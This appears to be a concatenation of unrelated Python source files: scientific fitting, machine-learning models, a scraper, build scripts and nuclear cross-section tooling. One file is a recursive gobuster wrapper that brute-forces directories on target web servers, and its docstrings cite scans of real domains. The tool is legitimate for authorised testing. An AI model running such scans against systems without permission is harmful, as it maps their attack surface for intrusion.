# print "poly", fit_np
if verbose:
fig, ax = plt.subplots()
print("fit result y = %s e^(x * %s) + %s" % (beta[0],beta[1],beta[2]))
ax.plot(data[:,0], data[:,1], "bo")
# plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
ax.plot(data[:,0], exp_func(beta, data[:,0]), "r--", lw = 2)
plt.tight_layout()
plt.show()
return beta
def main(row = [1353., 1353., 1353.],
col = [980., 987., 995.],
frame = [87,86,85],
):
dist = [math.sqrt(row[i]**2 + col[i]**2) for i in range(len(row))]
data = np.zeros(shape=(len(row),2))
data[:,0] = np.array(frame)
data[:,1] = np.array(dist)
do_linear_fit(data,verbose=True)
if __name__ == "__main__":
main()
|
from flask import Flask,render_template
from os import walk
app=Flask(__name__,static_folder="Z:\电影\三体-广播剧",static_url_path="/yjw")
@app.route("/")
def wlx():
s=[]
for root,dirs,files in walk("Z:\电影\三体-广播剧"):
for file in files:
b=root+"\\"+file
b=b.replace("\\","/")
b=b.replace("Z:/电影/三体-广播剧/","")
print(b)
s.append(b)
return render_template("mood.html",s=s)
if __name__ == '__main__':
app.run()
# fixed
|
import os
from os import path
import sys
tld = path.realpath(path.join(path.dirname(__file__), '../..'))
sys.path.append(path.join(tld, 'lib/python3.5/site-packages'))
import glob
import subprocess
from distutils.core import setup
from distutils.extension import Extension
from Cython.Build import cythonize
here = os.path.dirname(os.path.realpath(__file__))
source_files = glob.glob('./jamovi/core/*.cpp')
source_files.extend(glob.glob('./jamovi/common/*.cpp'))
source_files.append('./jamovi/core.pyx')
# exclude the generated core.cpp (made from core.pyx)
source_files = list(filter(lambda file: not file.endswith('core.cpp'), source_files))
include_dirs = [
path.join(here, './jamovi/core'),
path.join(here, './jamovi/common'),
path.join(tld, 'include') ]
if os.name == 'nt': # windows
libraries = [ "libboost_filesystem-vc140-mt-1_60", "libboost_system-vc140-mt-1_60" ]
library_dirs = [ tld + '/lib/libvc' ]
extra_compile_args = ["/D", "UNICODE"]
elif os.uname()[0] == "Linux":
libraries = [ "boost_filesystem", "boost_system" ]
library_dirs = [ ]
extra_compile_args = [ ]
else:
libraries = [ "boost_filesystem-mt", "boost_system-mt" ]
library_dirs = [ tld + '/../Frameworks' ]
extra_compile_args = [ ]
extensions = [
Extension('jamovi.core',
source_files,
include_dirs=include_dirs,
libraries=libraries,
library_dirs=library_dirs,
extra_compile_args=extra_compile_args,
language="c++",
undef_macros=[ "NDEBUG" ])
]
here = path.abspath(path.dirname(__file__))
# build server/jamovi_pb.py
rc = subprocess.call([
'protoc',
'--proto_path=' + path.join(here, 'jamovi/server'),
'--python_out=' + path.join(here, 'jamovi/server'),
path.join(here, 'jamovi/server/jamovi.proto')])
if rc != 0:
raise(RuntimeError('protoc failed!'))
setup(
name='jamovi',
version='0.1.0',
description='jamovi statistical software',
long_description='jamovi statistical software',
url='https://jamovi.org',
author='Jonathon Love',
author_email='jon@thon.cc',
license='AGPL3',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='statistics analysis spreadsheet',
packages=['jamovi.server', 'jamovi.core', 'jamovi.server.formatio', 'jamovi.server.utils'],
ext_modules=cythonize(
extensions,
language="c++"),
install_requires=[
'tornado',
'protobuf',
'nanomsg',
'PyYAML'],
extras_require={
'dev': ['cython'],
'test': ['flake8'],
},
package_data={
'jamovi.server': [ 'jamovi.proto' ]
},
data_files=[
('jamovi/server/resources/client', glob.glob('jamovi/server/resources/client/*.*')),
('jamovi/server/resources/client/assets', glob.glob('jamovi/server/resources/client/assets/*.*'))
],
entry_points={
'console_scripts': [
'jamovi-server=jamovi.server:start',
],
},
)
|
from typing import Union
import httpx
import parsel
from core.utils import get_converted_currency
from schemas.search import Query
from .abstract import AbstractProvider
class MashinaKGProvider(AbstractProvider):
def get_validated_price(self, value: str) -> Union[str, None]:
if value:
return value.replace(" ", "")[1:]
return None
async def job(self, query: Query):
search_url = f"{self.url}/search/{query.brand.lower()}/{query.model.lower()}"
async with httpx.AsyncClient() as client:
response = await client.get(search_url)
html = parsel.Selector(text=response.text)
cars = []
for car in html.css(".table-view-list .list-item > a"):
cars.append(self.result(
url=f"{self.url}{car.xpath('@href').get()}",
price=await get_converted_currency(
self.get_validated_price(
car.css("div > p > strong::text").get(),
),
from_currency="USD",
to_currency="KGS"
),
image=car.css(
".thumb-item-carousel"
)[0].css("img")[0].xpath("@data-src").get()
))
return cars
|
import torch
from torch import nn
import torch.nn.functional as F
class ArcFace(nn.Module):
def __init__(self, margin = 0.5, scale = 64):
super(ArcFace, self).__init__()
self.margin = margin
self.scale = scale
#implementovano dle popisu z clanku ArcaFace https://arxiv.org/pdf/1801.07698.pdf
def forward(self, outputs, targets): #0.5 64
criterion = nn.CrossEntropyLoss()
original_target_logits = outputs.gather(1, torch.unsqueeze(targets, 1))
#arccos divergence pro hodnoty kolem hranice def. oboru -> *0.999999
original_target_logits = original_target_logits * 0.999999
thetas = torch.acos(original_target_logits)
marginal_target_logits = torch.cos(thetas + self.margin)
one_hot_mask = F.one_hot(targets, num_classes=outputs.shape[1])
diff = marginal_target_logits - original_target_logits
expanded = diff.expand(-1, outputs.shape[1])
outputs = self.scale * (outputs + (expanded * one_hot_mask))
return criterion(outputs, targets) |
#!/usr/bin/env python3
# Import standard modules ...
import unittest
# Import my modules ...
try:
import pyguymer3
except:
raise Exception("\"pyguymer3\" is not installed; you need to have the Python module from https://github.com/Guymer/PyGuymer3 located somewhere in your $PYTHONPATH") from None
# Define a test case ...
class MyTestCase(unittest.TestCase):
# Define a test ...
def test_convertBytesToPrettyBytes(self):
self.assertSequenceEqual(
pyguymer3.convert_bytes_to_pretty_bytes(16.0 * 1024.0 * 1024.0),
(16.0, "MiB"),
)
# Define a test ...
def test_convertPrettyBytesToBytes(self):
self.assertEqual(
pyguymer3.convert_pretty_bytes_to_bytes("16.0 MiB"),
16.0 * 1024.0 * 1024.0,
)
# Define a test ...
def test_findIntegerDivisors(self):
self.assertSequenceEqual(
pyguymer3.find_integer_divisors(12),
[2, 3, 4, 6],
)
# Define a test ...
def test_interpolate(self):
self.assertEqual(
pyguymer3.interpolate(1.0, 3.0, 2.0, 4.0, 2.0),
3.0,
)
# Define a test ...
def test_intersection(self):
self.assertSequenceEqual(
pyguymer3.intersection(
(1.0, 3.0),
(3.0, 1.0),
(1.0, 1.0),
(3.0, 3.0),
).tolist(),
[2.0, 2.0],
)
# Define a test ...
def test_makePathSafe(self):
self.assertEqual(
pyguymer3.make_path_safe(".what do you think of this path?"),
" .what do you think of this path",
)
# Use the proper idiom in the main module ...
# NOTE: See https://docs.python.org/3.11/library/multiprocessing.html#the-spawn-and-forkserver-start-methods
if __name__ == "__main__":
# Run the tests ...
unittest.main()
|
from adxl345 import ADXL345
from time import sleep
adxl345 = ADXL345()
while 1:
axes = adxl345.getAxes(True)
print "x= %.3fG\ty=%.3fG\tz=%.3fG" %(axes['x'], axes['y'], axes['z'])
sleep(1)
|
import sys
import os
import gevent
def watch_modules(callback):
modules = {}
while True:
for name, module in list(sys.modules.items()):
if module is None or not hasattr(module, '__file__'):
continue
module_source_path = os.path.abspath(module.__file__).rstrip('c')
try:
stat = os.stat(module_source_path)
except OSError:
continue
mtime = stat.st_mtime
if name in modules and modules[name] != mtime:
callback()
modules[name] = mtime
gevent.sleep(1)
def set_source_change_callback(callback):
gevent.spawn(watch_modules, callback)
|
#Title: Pie Graph
#Author: Hrishikesh H Pillai
#Date: 11-11-2019
import matplotlib.pyplot as plt
val=[12,34,50,43]
plt.pie(val)
plt.show() |
from itertools import chain, combinations, product
# Method to extract a value from nested tuple recursively
def extract_elem_from_tuple(my_var):
for val in my_var:
if type(val) == tuple:
for val in extract_elem_from_tuple(val):
yield val
else:
yield val
# Read from yaml file and create a list for each fields
lst_brand = ['Brand-X', 'Brand-Y', 'Brand-A']
lst_platform = ['98', 'NT', '2000', 'XP']
lst_version = [1, 2]
# Getting the Combinations from two lists
lst_complete = list(chain(lst_brand, lst_platform))
print(lst_complete)
combination_lst = list(combinations(lst_complete, 2))
print(len(combination_lst), combination_lst)
# Removing unwanted combinations
temp_combination_lst = combination_lst.copy()
for item in combination_lst:
if item[0] in lst_brand and item[1] in lst_brand:
temp_combination_lst.remove(item)
elif item[0] in lst_platform and item[1] in lst_platform:
temp_combination_lst.remove(item)
else:
continue
print(len(temp_combination_lst), temp_combination_lst)
# Expanding a nested tuple
lst_out = []
for every_item in temp_combination_lst:
out = list(extract_elem_from_tuple(every_item))
lst_out.append(out)
print('>>>>>>>>>>>>>>>>', lst_out)
# Get number of occurence of value1 in the combination list
flatten_lst = list(chain(*lst_out))
occurence_count = flatten_lst.count(lst_brand[0])
print('Count of item in field-1: {0}'.format(occurence_count))
print(lst_out)
# Cartesian Product
# out_lst = list(product(temp_combination_lst, lst_version))
# print(len(out_lst), out_lst)
# Expanding a nested tuple
# lst_out = []
# for every_item in out_lst:
# out = list(extract_elem_from_tuple(every_item))
# lst_out.append(out)
# print('>>>>>>>>>>>>>>>>', lst_out)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from . import ConvLSTMCell, Sign
class EncoderCell(nn.Module):
def __init__(self):
super(EncoderCell, self).__init__()
self.conv = nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1,
bias=False)
self.rnn1 = ConvLSTMCell(64, 256, kernel_size=3, stride=2, padding=1,
hidden_kernel_size=1, bias=False)
self.rnn2 = ConvLSTMCell(256, 512, kernel_size=3, stride=2, padding=1,
hidden_kernel_size=1, bias=False)
self.rnn3 = ConvLSTMCell(512, 512, kernel_size=3, stride=2, padding=1,
hidden_kernel_size=1, bias=False)
def forward(self, input, hs):
h1, h2, h3 = hs
x = self.conv(input)
h1 = self.rnn1(x, h1)
x = h1[0]
h2 = self.rnn2(x, h2)
x = h2[0]
h3 = self.rnn3(x, h3)
x = h3[0]
return x, [h1, h2, h3]
def create_zeros(self, dims, gpu, grad):
tmp = (torch.zeros(*dims, requires_grad=grad),
torch.zeros(*dims, requires_grad=grad))
tmp = (tmp[0].cuda(), tmp[1].cuda()) if gpu else tmp
return tmp
def create_hidden(self, batch_size, gpu=True, grad=True):
h1 = self.create_zeros([batch_size, 256, 8, 8], gpu, grad)
h2 = self.create_zeros([batch_size, 512, 4, 4], gpu, grad)
h3 = self.create_zeros([batch_size, 512, 2, 2], gpu, grad)
return [h1, h2, h3]
class Binarizer(nn.Module):
def __init__(self):
super(Binarizer, self).__init__()
self.conv = nn.Conv2d(512, 32, kernel_size=1, bias=False)
self.sign = Sign()
def forward(self, input):
feat = self.conv(input)
x = torch.tanh(feat)
return self.sign(x)
class DecoderCell(nn.Module):
def __init__(self):
super(DecoderCell, self).__init__()
self.conv1 = nn.Conv2d(32, 512, kernel_size=1, stride=1, padding=0,
bias=False)
self.rnn1 = ConvLSTMCell(512, 512, kernel_size=3, stride=1, padding=1,
hidden_kernel_size=1, bias=False)
self.rnn2 = ConvLSTMCell(128, 512, kernel_size=3, stride=1, padding=1,
hidden_kernel_size=1, bias=False)
self.rnn3 = ConvLSTMCell(128, 256, kernel_size=3, stride=1, padding=1,
hidden_kernel_size=3, bias=False)
self.rnn4 = ConvLSTMCell(64, 128, kernel_size=3, stride=1, padding=1,
hidden_kernel_size=3, bias=False)
self.conv2 = nn.Conv2d(32, 3, kernel_size=1, stride=1, padding=0,
bias=False)
def forward(self, input, hs):
h1, h2, h3, h4 = hs
x = self.conv1(input)
h1 = self.rnn1(x, h1)
x = h1[0]
x = F.pixel_shuffle(x, 2)
h2 = self.rnn2(x, h2)
x = h2[0]
x = F.pixel_shuffle(x, 2)
h3 = self.rnn3(x, h3)
x = h3[0]
x = F.pixel_shuffle(x, 2)
h4 = self.rnn4(x, h4)
x = h4[0]
x = F.pixel_shuffle(x, 2)
x = torch.tanh(self.conv2(x)) / 2
return x, [h1, h2, h3, h4]
def create_zeros(self, dims, gpu, grad):
tmp = (torch.zeros(*dims, requires_grad=grad),
torch.zeros(*dims, requires_grad=grad))
tmp = (tmp[0].cuda(), tmp[1].cuda()) if gpu else tmp
return tmp
def create_hidden(self, batch_size, gpu=True, grad=True):
h1 = self.create_zeros([batch_size, 512, 2, 2], gpu, grad)
h2 = self.create_zeros([batch_size, 512, 4, 4], gpu, grad)
h3 = self.create_zeros([batch_size, 256, 8, 8], gpu, grad)
h4 = self.create_zeros([batch_size, 128, 16, 16], gpu, grad)
return [h1, h2, h3, h4]
|
"""
Title: recursive-gobuster
Date: 20190110
Author: epi <epibar052@gmail.com>
https://epi052.gitlab.io/notes-to-self/
Tested on:
linux/x86_64 4.15.0-43-generic
Python 3.6.6
pyinotify 0.9.6
"""
import time
import signal
import shutil
import argparse
import tempfile
import subprocess
from pathlib import Path
import pyinotify
active_scans = list()
completed_scans = list()
class EventHandler(pyinotify.ProcessEvent):
"""
Handles notifications and takes actions through specific processing methods.
For an EVENT_TYPE, a process_EVENT_TYPE function will execute.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.user = kwargs.get("user")
self.proxy = kwargs.get("proxy")
self.status = kwargs.get("status")
self.tmpdir = kwargs.get("tmpdir")
self.devnull = kwargs.get("devnull")
self.threads = kwargs.get("threads")
self.version = kwargs.get("version")
self.password = kwargs.get("password")
self.wordlist = kwargs.get("wordlist")
self.extensions = kwargs.get("extensions")
self.target = self.original_target = kwargs.get("target")
def _normalize_targetname(self, tgt: str) -> str:
""" Returns a string representing a target URL that is compatible with linux filesystem naming conventions.
Forward slashes (/) are not allowed in linux file names. This function simply replaces them with an underscore.
Args:
tgt: target url i.e. http://10.10.10.112/images/
Returns:
normalized target url i.e. http:__10.10.10.112_images_
"""
return tgt.replace("/", "_")
def run_gobuster(self, target: str) -> None:
""" Runs gobuster in a non-blocking subprocess.
The function is pretty opinionated about options fed to gobuster. Removing the -e, or -n will likely break
functionality of the script. The other options are either configurable via command line options, or can be
manipulated without any adverse side-effects.
Hard-coded options/args
-q
Don't print the banner and other noise
-e
Expanded mode, print full URLs
-k
Skip SSL certificate verification
Args:
target: target url i.e. http://10.10.10.112/images/
"""
normalized_target = self._normalize_targetname(target)
command = ["gobuster"]
if self.version == 3:
command.append("dir")
if not self.status:
# don't show status codes
command.append("-n")
command.extend(
[
"-q", # don't print banner
"-e", # print full URLs
"-k", # skip SSL cert verification
"-t",
self.threads,
"-u",
target,
"-w",
self.wordlist,
"-o",
f"{self.tmpdir}/{normalized_target}",
]
)
if self.extensions:
command.append("-x")
command.append(self.extensions)
if self.user:
# gobuster silently ignores the case where -P is set but -U is not; we'll follow suit.
command.append("-U")
command.append(self.user)
if self.password is not None:
# password set to anything (including empty string)
command.append("-P")
command.append(self.password)
if self.proxy:
command.append("-p")
command.append(self.proxy)
suppress = subprocess.DEVNULL if self.devnull else None
try:
subprocess.Popen(command, stderr=suppress)
except FileNotFoundError as e:
print(e)
raise SystemExit
active_scans.append(normalized_target)
def process_IN_MODIFY(self, event: pyinotify.Event) -> None:
""" Handles event produced when a file is modified.
This function is designed to trigger when any of the watched gobuster output files are appended to. The
output files are appened to each time a new file/folder is identified by gobuster. This function will
pull out the new entry and start a new gobuster scan against it, if appropriate.
Args:
event: pyinotify.Event
"""
with open(event.pathname) as f:
for line in f:
line = line.strip()
if self.status:
# status codes are included, need to grab just the url for processing
# https://assetinventory.bugcrowd.com/favicon.ico (Status: 200)
line = line.split(maxsplit=1)[0]
"""
In response to https://github.com/epi052/recursive-gobuster/issues/2
In the scans below, 00.php/ should not kick off another scan. The loop below aims to address the problem.
gobuster -q -n -e -k -t 20 -u https://bluejeans.com/00/ -w /wordlists/seclists/Discovery/Web-Content/common.txt -o /tmp/rcrsv-gbstryv_fcneq/https:__bluejeans.com_00_ -x php
gobuster -q -n -e -k -t 20 -u https://bluejeans.com/00.php/ -w /wordlists/seclists/Discovery/Web-Content/common.txt -o /tmp/rcrsv-gbstryv_fcneq/https:__bluejeans.com_00.php_ -x php
"""
for extension in self.extensions.split(","):
if line.endswith(f".{extension}"):
break
else:
# found a path -> https://somedomain/images, add a forward slash to scan in case of dir-ness
tgt = f"{line}/"
normalized_target = self._normalize_targetname(tgt)
if (
normalized_target in active_scans or normalized_target in completed_scans
): # skip active/complete
continue
# found a directory that is not being actively scanned and has not already been scanned
self.run_gobuster(target=tgt)
def process_IN_CLOSE_WRITE(self, event: pyinotify.Event) -> None:
""" Handles event produced when a file that was open for writing is closed.
This function is designed to trigger when any of the watched gobuster output files are closed. This is
indicative of scan completion.
Args:
event: pyinotify.Event
"""
normalized_target = self._normalize_targetname(event.name)
# scan related to the target is complete; remove it from active and place it in complete
active_scans.remove(normalized_target)
completed_scans.append(normalized_target)
if not active_scans:
# likely, no more scans are running
time.sleep(3) # attempt to avoid race condition
if not active_scans:
# check one last time
print(f"All scans complete. Cleaning up.")
self.cleanup(None, None)
def cleanup(self, sig, frame) -> None:
""" Simple function to write results seen so far and remove the temp directory.
Can be called from either all scans completing, or receiving a SIGINT. When triggered from catching a SIGINT,
the function is called with two arguments: the signal number and the current stack frame. When we call it
ourselves, we don't care about those, so we can just call this manually with sig=None,frame=None
Args:
sig: signal number or None
frame: current stack frame or None
"""
results = list()
pathtmpdir = Path(self.tmpdir)
if pathtmpdir.exists(): # ensure we got at least some results
for file in pathtmpdir.iterdir():
with file.open() as f:
results += f.readlines()
results.sort()
with open(
f"recursive-gobuster_{self._normalize_targetname(self.original_target)}.log", "w"
) as f:
f.write("".join(results))
shutil.rmtree(self.tmpdir)
raise SystemExit(0)
def get_gobuster_version() -> int:
""" Return an int representing gobuster's version.
There is no --version or similar for gobuster, so this function checks output of running gobuster without
any options/arguments. Depending on the usage statement, we determine whether or not gobuster is version
3+ or not.
Returns:
int representing gobuster version; internal representation only. Not in sync with gobuster releases
"""
proc = subprocess.run(["gobuster"], stdout=subprocess.PIPE)
# version 3+ with dns dir etc...
return 3 if b"Usage:" in proc.stdout.splitlines()[0] else 2
def main(args_ns: argparse.Namespace) -> None:
tmpdir = tempfile.mkdtemp(prefix="rcrsv-gbstr") # directory for gobuster scan results
# watch manager stores the watches and provides operations on watches
wm = pyinotify.WatchManager()
version = get_gobuster_version()
handler = EventHandler(
target=args_ns.target,
tmpdir=tmpdir,
wordlist=args_ns.wordlist,
threads=args_ns.threads,
extensions=args_ns.extensions,
devnull=args.devnull,
user=args_ns.user,
password=args_ns.password,
proxy=args_ns.proxy,
version=version,
status=args_ns.status,
)
notifier = pyinotify.Notifier(wm, handler)
# watch for file appends (found dir/file) and files closing (scan complete)
mask = pyinotify.IN_MODIFY | pyinotify.IN_CLOSE_WRITE
wm.add_watch(tmpdir, mask)
handler.run_gobuster(args_ns.target) # kick off first scan against initial target
signal.signal(signal.SIGINT, handler.cleanup) # register signal handler to handle SIGINT
notifier.loop()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-t", "--threads", default="20", help="# of threads for each spawned gobuster (default: 20)"
)
parser.add_argument(
"-x",
"--extensions",
help="extensions passed to the -x option for spawned gobuster",
default="",
)
parser.add_argument(
"-w",
"--wordlist",
default="/usr/share/seclists/Discovery/Web-Content/common.txt",
help="wordlist for each spawned gobuster (default: /usr/share/seclists/Discovery/Web-Content/common.txt)",
)
parser.add_argument(
"-d", "--devnull", action="store_true", default=False, help="send stderr to devnull"
)
parser.add_argument("-U", "--user", help="Username for Basic Auth (dir mode only)")
parser.add_argument("-P", "--password", help="Password for Basic Auth (dir mode only)")
parser.add_argument(
"-p", "--proxy", help="Proxy to use for requests [http(s)://host:port] (dir mode only)"
)
parser.add_argument(
"-s",
"--status",
help="Include status code reporting (default: false)",
action="store_true",
default=False,
)
parser.add_argument("target", help="target to scan")
args = parser.parse_args()
main(args)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
training = pd.read_csv('E:/train.csv')
x_training = training['x']
y_training = training['y']
x_training = np.array(x_training)
y_training = np.array(y_training)
# print(x_training, " ", y_training)
def finda(m, alpha, y_training, x_training):
count = 0
a0 = 0
a1 = 0
while count < 90000:
y = a0 + a1 * x_training
error = y - y_training
mean_square_error = (1 / m) * (np.sum(error) ** 2)
a0 = a0 - (alpha * (2 / m) * np.sum(error))
a1 = a1 - (alpha * (2 / m) * np.sum(error*x_training))
count += 1
print(mean_square_error, " :", "y = ", a0, " + ", a1, "x")
finda(98, 0.0001, y_training, x_training)
plt.scatter(x_training, y_training)
plt.rcParams["scatter.marker"] = ','
|
import os
import sys
import re
import numpy as np
import openmc
import openmc.mgxs
from make_bn800 import *
# Start global variables
N_LEGEND = 2
N_DELAY = 1
# PATH
PATH = "/home/barakuda/Рабочий стол/hdf5_openmc/XMAS172jeff2p2woZr71"
# PATH
ENERGIES = [19640330,
17332530,
14918250,
13840310,
11618340,
10000000,
8187308,
6703200,
6065307,
5488116,
4493290,
3678794,
3011942,
2465970,
2231302,
2018965,
1652989,
1353353,
1224564,
1108032,
1002588,
907179.5,
820850,
608100.625,
550232.188,
497870.688,
450492,
407622,
301973.812,
273237.188,
247235.297,
183156.406,
122773.398,
111090,
82297.4688,
67379.4688,
55165.6406,
40867.7109,
36978.6406,
29283,
27394.4492,
24787.5195,
16615.5703,
15034.3896,
11137.75,
9118.82031,
7465.85791,
5530.84424,
5004.51416,
3526.62207,
3354.62598,
2248.6731,
2034.68396,
1507.33105,
1433.81702,
1234.09802,
1010.39398,
914.24231,
748.518311,
677.287415,
453.999298,
371.703186,
304.324799,
203.994995,
148.625397,
136.742004,
91.660881,
75.6735687,
67.9040527,
55.5951309,
51.5780182,
48.2515984,
45.5174408,
40.1689987,
37.2665291,
33.72015,
30.5112591,
27.6077309,
24.9804993,
22.6032906,
19.4548397,
15.9282703,
13.70959,
11.2244596,
9.90555382,
9.18981361,
8.31528664,
7.523983,
6.1601162,
5.34642982,
5.04347706,
4.12925005,
4,
3.38074994,
3.29999995,
2.76792002,
2.72000003,
2.5999999,
2.54999995,
2.3599999,
2.13000011,
2.0999999,
2.01999998,
1.92999995,
1.84000003,
1.755,
1.66999996,
1.59000003,
1.5,
1.47500002,
1.44000006,
1.37,
1.33749998,
1.29999995,
1.23500001,
1.16999996,
1.14999998,
1.12300003,
1.11000001,
1.097,
1.07099998,
1.04499996,
1.03499997,
1.01999998,
0.995999992,
0.986000001,
0.972000003,
0.949999988,
0.930000007,
0.910000026,
0.860000014,
0.850000024,
0.790000021,
0.779999971,
0.704999983,
0.625,
0.540000021,
0.5,
0.485000014,
0.432999998,
0.400000006,
0.391000003,
0.349999994,
0.319999993,
0.314500004,
0.300000012,
0.280000001,
0.247999996,
0.219999999,
0.188999996,
0.180000007,
0.159999996,
0.140000001,
0.134000003,
0.115000002,
0.100000001,
9.50E-02,
8.00E-02,
7.70E-02,
6.70E-02,
5.80E-02,
5.00E-02,
4.20E-02,
3.50E-02,
3.00E-02,
2.50E-02,
2.00E-02,
1.50E-02,
1.00E-02,
6.90E-03,
5.00E-03,
3.00E-03,
1.00E-05]
tempdata = [300]
# tempdata = [300, 600, 900, 1200, 1500, 1800, 2100]
libgroup = {t : {} for t in tempdata}
ENERGIES = ENERGIES[::-1]
# Instantiate the energy group data
groups = openmc.mgxs.EnergyGroups(np.array(ENERGIES))
# end global variables
class groupsection:
def __init__(self, name, egroup, nlegendr, numdel, temp):
self.csname = name
self.energy = egroup
self.ng = len(self.energy) - 1
self.order = nlegendr
self.numdel = numdel
self.temperature = temp
def read_section(self, path):
f = open(path, 'r')
self._is_finished = False
self.nusfdel = []
self.chidel = []
self.scatxs = {i : [] for i in range(self.order)}
self.xsmatrix = []
_matxs = {i: [] for i in range(self.order)}
_curlegendr = 0
for line in f:
if (re.search("\sSF\s", line)):
self.sf = self._read_cs_data(f)
if (re.search("STOT", line)):
self.stot = self._read_cs_data(f)
if (re.search("SABS", line)):
self.sabs = self._read_cs_data(f)
if (re.search("SCAPT", line)):
self.scapt = self._read_cs_data(f)
if (re.search("CHI0", line)):
self.schi = self._read_cs_data(f)
if (re.search("NUSF0", line)):
self.nusf = self._read_cs_data(f)
if (re.search("CHIDEL", line)):
self.chidel.append(self._read_cs_data(f))
if (re.search("NUSFDEL", line)):
self.nusfdel.append(self._read_cs_data(f))
if (re.search("SIGS", line)):
_curlegendr = int(line.split()[-1][-1])
self.scatxs[_curlegendr].append(self._read_scat_data(f))
if (re.search("\sSCAT\d+", line)):
_curlegendr = int(line.split()[-1][-1])
if (re.search("SCATTERING FROM GROUP", line)):
_matxs[_curlegendr].append(self._read_scat_data(f))
for k, v in _matxs.items():
if (len(v) > 0):
self.xsmatrix.append(np.array(v).reshape(self.ng, self.ng))
self.xsmatrix = np.array(self.xsmatrix)
if (len(self.xsmatrix.shape) > 2):
self.xsmatrix = np.rollaxis(self.xsmatrix, 0 , 3)
f.close()
def _read_cs_data(self, f):
arr = []
for e in self.energy[1:]:
line = next(f)
arr.append(float(line.strip()))
return np.array(arr)
def _read_scat_data(self, f):
arr = []
while (len(arr) < self.ng):
line = next(f)
arr.extend([float(s) for s in line.split()])
return np.array(arr)
# Instantiate the energy group data
groups = openmc.mgxs.EnergyGroups(np.array(ENERGIES))
def temp_interolate(temparray, T):
if (T <= temparray[0]):
return [(temparray[0], 1)]
elif (T >= temparray[-1]):
return [(temparray[-1], 1), (temparray[-1], 0)]
else:
for j,_t in enumerate(temparray):
if (_t > T):
i = j-1
t = temparray[i]
break
return [(i, (temparray[i+1] -T)/(temparray[i+1] - temparray[i])), (i + 1, (T - t)/(temparray[i+1] - temparray[i]))]
#return [(t, (temparray[i+1] -T)/(temparray[i+1] - temparray[i])), (temparray[i+1], (T - t)/(temparray[i+1] - temparray[i]))]
def temp_libgroup(tempdata):
for t in tempdata:
tree = [tt for tt in os.walk(os.path.join(PATH, str(t)))]
#print(len( tree))
for fn in tree[0][-1]:
libgroup[t][fn] = groupsection(fn, ENERGIES, N_LEGEND, N_DELAY, t)
libgroup[t][fn].read_section(os.path.join(PATH, str(t), fn))
#print("Temp {} : {} ".format(t, fn))
return libgroup
# return libgroup
openmclib = {}
def prepare_temperature_independed_mg(libgroup, conc, namenuclide, tempdata,
groups, mattemp):
"""
Prepare multigroup data for calculation based with temperature independent
constant
Paramertres:
-----------
libgroup : dictionary
{temperature : dictonary { name of nuclide : element groupsection class }};
:param conc: dict
- dictionary with name of material : np.array - R*8 concentration of nuclide;
:param namenuclide:
- a list of nuclide names;
:param temperature:
- dictionary with name of material : temperature value;
:return:
- dictionary with name of material : openmc.MGXS class element
"""
# TEMPERATURE INDEPENDET CASE
openmclib = {}
for name, val in conc.items():
openmclib[name] = openmc.XSdata(name, groups, temperatures=[tempdata[0]])
openmclib[name].order = 1
stot = np.zeros(len(ENERGIES) - 1, dtype=np.double)
sabs = np.zeros(len(ENERGIES) - 1, dtype=np.double)
scapt = np.zeros(len(ENERGIES) - 1, dtype=np.double)
sf = np.zeros(len(ENERGIES) - 1, dtype=np.double)
nusf = np.zeros(len(ENERGIES) - 1, dtype=np.double)
chi = np.zeros(len(ENERGIES) - 1, dtype=np.double)
scatter = np.zeros((len(ENERGIES) - 1, len(ENERGIES) - 1, 2), dtype=np.double)
concentration = 0.0
for n, v in zip(namenuclide, val):
for el in temp_interolate(tempdata, mattemp[name]):
tt = el[0]
wt = el[1]
if (n in libgroup[tt].keys()):
stot += libgroup[tt][n].stot * v * wt
sabs += libgroup[tt][n].sabs * v * wt
scapt += libgroup[tt][n].scapt * v * wt
sf += libgroup[tt][n].sf * v * wt
nusf += libgroup[tt][n].nusf * v * wt
scatter += libgroup[tt][n].xsmatrix * v * wt
if (n in libgroup[tempdata[0]].keys()):
if (libgroup[tempdata[0]][n].sf.sum() > 0):
concentration += v
chi += libgroup[tempdata[0]][n].schi * v
if (concentration > 0):
chi = chi / concentration
openmclib[name].set_total(stot, temperature=tempdata[0])
openmclib[name].set_absorption(sabs, temperature=tempdata[0])
openmclib[name].set_scatter_matrix(scatter, temperature=tempdata[0])
openmclib[name].set_fission(sf, temperature=tempdata[0])
openmclib[name].set_nu_fission(nusf, temperature=tempdata[0])
openmclib[name].set_chi(chi, temperature=tempdata[0])
return openmclib
#
def prepare_mg(libgroup, conc, namenuclide, tempdata, groups, mattemp):
"""
Prepare multigroup data for calculation based with temperature independent
constant
Paramertres:
-----------
libgroup : dictionary
{temperature : dictonary { name of nuclide : element groupsection class }};
:param conc: dict
- dictionary with name of material : np.array - R*8 concentration of nuclide;
:param namenuclide:
- a list of nuclide names;
:param temperature:
- dictionary with name of material : temperature value;
:return:
- dictionary with name of material : openmc.MGXS class element
"""
# TEMPERATURE INDEPENDET CASE
openmclib = {}
t0 = time.time()
nsize = len([k for k in conc])
values = np.array([v for v in conc.values()])
values = values.reshape(nsize, len(values[0]))
indices = nsize * [(tempdata[0], 1.0)]
indarray=np.zeros((nsize, 2), dtype = np.int)
wgtarray=np.zeros((nsize, 2), dtype = np.double)
stot = np.zeros((nsize, len(ENERGIES) - 1), dtype=np.double)
sabs = np.zeros((nsize,len(ENERGIES) - 1), dtype=np.double)
scapt = np.zeros((nsize,len(ENERGIES) - 1), dtype=np.double)
sf = np.zeros((nsize,len(ENERGIES) - 1), dtype=np.double)
nusf = np.zeros((nsize,len(ENERGIES) - 1), dtype=np.double)
chi = np.zeros((nsize,len(ENERGIES) - 1), dtype=np.double)
scatter = np.zeros((nsize,len(ENERGIES) - 1, len(ENERGIES) - 1, 2),
dtype=np.double)
for i, name in enumerate(mattemp.keys()):
openmclib[name] = openmc.XSdata(name, groups, temperatures=[tempdata[0]])
openmclib[name].order = 1
indices[i] = temp_interolate(tempdata, mattemp[name])
